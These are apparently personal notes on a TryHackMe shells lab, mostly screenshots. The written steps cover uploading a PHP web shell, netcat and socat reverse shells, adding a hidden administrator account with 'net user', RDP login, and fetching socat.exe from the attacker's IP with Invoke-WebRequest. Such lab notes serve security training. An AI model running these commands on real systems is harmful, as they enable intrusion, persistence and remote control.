shell - HackMD

# shell ###### tags: `shell` `tryhackme` [TOC] ## Gather Information ![](https://i.imgur.com/RVQAJHX.png) Port 80 -> linux upload we could try upload the webshell on target macine ![](https://i.imgur.com/1pNqgLK.png) ## msfvenom ### Generate web shell(PHP) msfvenom -l payload | grep -i "php" ![](https://i.imgur.com/Nqk4NVO.png) ### upload the web shell ![](https://i.imgur.com/IClK1Cp.png) ### Handler(listening) ![](https://i.imgur.com/FLpqSQa.png) ### Metepreter Up Grade the Shell ![](https://i.imgur.com/5qK2Ad7.png) ![](https://i.imgur.com/OQIHOGo.png) --- # Linux LAB ![](https://i.imgur.com/JZOMo6d.png) Next step ## Netcat Reverse Shell ![](https://i.imgur.com/hHdhQfL.png) --- target nc -> our machine (80) ![](https://i.imgur.com/BAjbsVf.png) ## Socat (stable Necat) Generate the certificate and key ![](https://i.imgur.com/nzxGsbC.png) --- ![](https://i.imgur.com/eIGZbmn.png) --- ![](https://i.imgur.com/4h0HJ77.png) ![](https://i.imgur.com/ahPrSP7.png) ![](https://i.imgur.com/LjwVC8z.png) ![](https://i.imgur.com/ILolNKY.png) # Windows lab ![](https://i.imgur.com/v0DyQSf.png) ![](https://i.imgur.com/s6EoHHF.png) Upload web shell php_reverse (web shell ) ## Gain PowerShell ![](https://i.imgur.com/C1rspJz.png) ![](https://i.imgur.com/Cx8ghD1.png) ![](https://i.imgur.com/cbRM9Co.png) ## Add new USER net user meowhecker meowhecker /add net localgroup administrators meowhecker /add ![](https://i.imgur.com/E86OfqU.png) ## PDR login (by meowhcker) ``` xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.241.25 /u:meowhecker /p:'meowhecker' ``` ![](https://i.imgur.com/7gN18Kv.png) ![](https://i.imgur.com/6BVUMb4.png) ## Socat Upload socat Under the Powershell ``` Invoke-WebRequest -uri http://10.17.11.72:8000/socat.exe -outfile C:\\Windows\temp\socat.exe ``` # Problem Dowload socat -> permission denied ![](https://i.imgur.com/gBEiokB.png)